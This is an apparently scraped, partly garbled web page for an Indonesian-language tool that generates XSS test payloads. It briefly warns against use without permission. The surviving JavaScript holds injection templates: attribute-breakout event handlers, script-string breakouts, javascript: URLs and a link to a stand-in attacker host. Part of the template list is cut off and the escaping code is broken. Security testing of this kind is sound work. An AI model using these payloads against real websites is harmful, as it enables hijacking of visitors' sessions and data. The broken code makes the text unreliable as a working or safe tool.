XSS Payload Crafting & Testing — Safe Mode

Alat ini membantu membuat payload XSS (untuk pengujian di lab/VM yang Anda kendalikan). JANGAN gunakan terhadap sistem tanpa izin. Ada juga mode preview-safe yang menampilkan payload sebagai teks saja.

Generated Payloads
-
`,``,``], attr: [`" onmouseover="PAY" "`, `'>`], js: [`';PAY;//`,`\";PAY;//`], url: [`javascript:PAY`, `https://attacker.example.test/?q=PAY`] }; $('gen').addEventListener('click', ()=>{ const ctx = $('ctx').value; const custom = ($('custom').value||'alert(1)'); const list = templates[ctx].map(t=> t.replace('PAY', custom)); $('out').textContent = list.join('\n\n'); window._lastXss = list; }); $('preview').addEventListener('click', ()=>{ const last = window._lastXss || []; if (!last.length){ alert('Generate dulu'); return; } // show escaped preview const esc = last.map(l=> l.replace(//g,'>')).join('\n\n'); $('out').textContent = esc; }); $('clear').addEventListener('click', ()=>{ $('out').textContent='-'; $('custom').value=''; window._lastXss=null; });